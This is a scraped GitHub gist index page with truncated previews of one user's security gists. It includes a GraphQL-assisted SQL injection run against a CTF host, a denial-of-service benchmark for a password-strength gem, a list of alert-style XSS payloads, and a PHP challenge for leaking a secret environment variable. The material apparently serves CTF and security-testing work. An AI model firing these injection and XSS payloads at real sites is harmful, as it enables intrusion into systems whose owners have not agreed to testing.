@cianmce
cianmce / README.md
Last active April 16, 2020 13:25
GQL assisted SQL injection

MySQL Version

ruby generate_gql_mysql.rb \
  && time curl -X POST -H "Content-Type: application/json" -d @query.json https://gql-ctf-2.herokuapp.com/graphql.json > response.json \
  && ruby decode.rb

PostgreSQL Version

echo "printenv-ing"
printenv
echo "done"
echo ""
@cianmce
cianmce / benchmark_password_strength.rb
Last active May 27, 2018 20:23
DOS fnando/password_strength
require 'securerandom'
require 'password_strength'
require 'benchmark'
def random_string(len)
  SecureRandom.base64(len)[0...len]
end
Benchmark.bm do |x|
<html>
<script>
var xsss = [
'<script >alert("XSS - 1");</script >',
'<script type="application/javascript">alert("XSS - 2");</script >',
'<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >',
'<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />',
'<input type="image" src onerror="alert(\"XSS - 5\")">',
'<object data="a.a" onerror="alert(\"XSS - 6\")" />',
'<object data="a.a" onerror="alert(\"XSS - 7\")">',
@cianmce
cianmce / alert.html
Last active March 26, 2018 15:41
Click "Raw" and replace "gist.githubusercontent.com" with "rawgit.com" and add "?msg=Some message" to the end
<html>
<script>
/*
Add GET param "msg" e.g. "?msg=Some message"
*/
alert(decodeURI(location.href.split('?msg=')[1]));
</script>
</html>
alert(document.currentScript.getAttribute('msg') || document.currentScript.getAttribute('src').split('msg=')[1] || "XSS!");
<?php
/*
Run using:
SECRET="Some super secret text" php -S localhost:8000
Goal:
Find out what the SECRET env is
*/
if (empty($_POST['hmac']) || empty($_POST['host'])) {
#!/bin/bash
# install by adding:
# alias venv=". ~/location/venv.sh"
# to .bashrc
help_string="venv [option] [VENV_NAME]
VENV_NAME
activates VENV_NAME if it exists

Keybase proof

I hereby claim:

  • I am cianmce on github.
  • I am cianmce (https://keybase.io/cianmce) on keybase.
  • I have a public key whose fingerprint is 95D8 378B 422A 8F0F 3585 749E 0CA9 E26E 2130 99FB

To claim this, I am signing this object: